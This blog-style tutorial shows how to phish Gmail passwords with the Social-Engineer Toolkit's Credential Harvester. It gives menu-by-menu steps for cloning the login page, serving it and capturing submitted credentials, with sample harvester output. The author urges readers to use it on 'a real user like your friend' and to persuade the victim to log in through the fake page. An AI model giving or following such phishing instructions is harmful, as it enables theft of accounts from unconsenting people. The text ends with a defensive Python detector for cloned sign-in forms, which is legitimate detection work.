Never Ending Security

It starts all here

Hack gmail password with social engineering toolkit (SET)

Social Engineering Toolkit

The Social-Engineer Toolkit (SET) is the most powerful tool for performing social engineering attacks. In a way, it is the Metasploit of social engineering. It provides a very easy user interface for attacks such as phishing and browser exploitation. In this tutorial we will see how it can be used to perform a phishing attack that tries to capture someone's Gmail password.

Credential Harvester Attack

The Credential Harvester attack is one of the options available inside SET. It creates phishing pages, starts a server to serve them, and catches any login data users submit. Let's run it and see how it works.

Start SET in a terminal. It should come up with its welcome screen.

                 .M"""bgd `7MM"""YMM MMP""MM""YMM 
                ,MI    "Y   MM    `7 P'   MM   `7 
                `MMb.       MM   d        MM      
                  `YMMNq.   MMmmMM        MM      
                .     `MM   MM   Y  ,     MM      
                Mb     dM   MM     ,M     MM      
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs:         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage:       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    Join us on in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.


 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit


For this attack type we need to select “Social-Engineering Attacks” from the main menu. Type 1 and press Enter. SET then presents another menu that looks like this:

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Here we can choose from various kinds of social engineering attacks. For our purpose, select option 2, “Website Attack Vectors”. Another menu appears, like the one below:

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

This time the menu comes with a short explanation of each attack. The Credential Harvester Attack Method, which we are going to use, is number 3. It is explained as:

The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

So select number 3 and proceed. It will present another menu like this:

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Here we are going to clone a site to construct our phishing page, so select option 2.

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:
[-] SET supports both HTTP and HTTPS
[-] Example:
set:webattack> Enter the url to clone:

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

On selecting option 2, it will ask for two important pieces of information. The first is the IP address to which the data will be submitted, and the second is the URL to clone, which is in this case

So enter the details and press Enter when it asks you to press return. The credential harvester will now start a web server on port 80 that serves the page. Open the IP address of the machine in a browser, either from some other machine or just from localhost. For example, if SET is running on a machine with IP address then open that IP in a browser from another machine. Or give the IP address to someone else over the network :)

Now, when the username and password are entered and submitted, SET captures the data and displays it on the terminal. Moreover, after capturing the data SET redirects the user to the actual site, that is

- - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
- - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
- - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1

See the fields Email and Passwd; they contain the details typed by the user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer to access the SET clone of Gmail.

If SET is running on your local machine, then you have to give your public IP address to the victim. He would open the link and get the Gmail login page. The rest of the task is to persuade him to log in through that page. If you are able to do so, you get the login details. The credential harvester attack is not limited to stealing login data; it can capture any generic form submission.

Phishing attacks are very common in the form of spam emails. Hackers set up phishing pages on web hosts and then spread the links to users over email. Phishing pages range from simple email sites to bank logins and more.
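From the defender's side, the PARAM names in the SET output above make a usable signature: a cloned page still submits Google's sign-in field names, but to a host that is not Google, often over plain HTTP and to a bare IP address. The following is an added example, not part of the original tutorial or of SET; it assumes a web proxy that records the method, URL and URL-encoded body of form POSTs, and the allowlist, threshold and sample records are constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Field names taken from the PARAM lines in the SET output above.
GOOGLE_SIGNIN_FIELDS = {"service", "ltmpl", "dsh", "bgresponse", "signIn",
                        "PersistentCookie", "rmShown", "checkedDomains"}
# Assumption: hosts that legitimately receive this form in your environment.
LEGIT_HOSTS = {"accounts.google.com"}
MIN_MATCHES = 4  # assumed threshold; tune against your own traffic

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False

def score_post(url, body):
    """Return (is_suspicious, reasons) for one form POST seen by the proxy."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    fields = set(parse_qs(body, keep_blank_values=True))
    matched = fields & GOOGLE_SIGNIN_FIELDS
    if len(matched) < MIN_MATCHES or host in LEGIT_HOSTS:
        return False, []
    reasons = [f"{len(matched)} Google sign-in fields posted to {host}"]
    if parts.scheme != "https":
        reasons.append("login form submitted over plain HTTP")
    if is_ip_literal(host):
        reasons.append("destination is a bare IP address")
    return True, reasons

# Constructed sample records (method, url, body); 203.0.113.10 is a documentation address.
SAMPLE_LOG = [
    ("POST", "http://203.0.113.10/", "continue=&service=mail&rm=false&ltmpl=default"
     "&scc=1&signIn=Sign+in&PersistentCookie=yes&rmShown=1"),
    ("POST", "https://accounts.google.com/", "service=mail&ltmpl=default&signIn=Sign+in&rmShown=1"),
    ("POST", "https://intranet.example/search", "q=quarterly+report&service=docs"),
]

def scan(log):
    """Return [(url, reasons)] for every suspicious POST in the log."""
    results = ((url, score_post(url, body)) for method, url, body in log if method == "POST")
    return [(url, reasons) for url, (bad, reasons) in results if bad]

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_LOG):
        print(url, "->", "; ".join(reasons))
```

Matching on field names rather than values means the proxy never needs to store submitted passwords to raise the alert.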
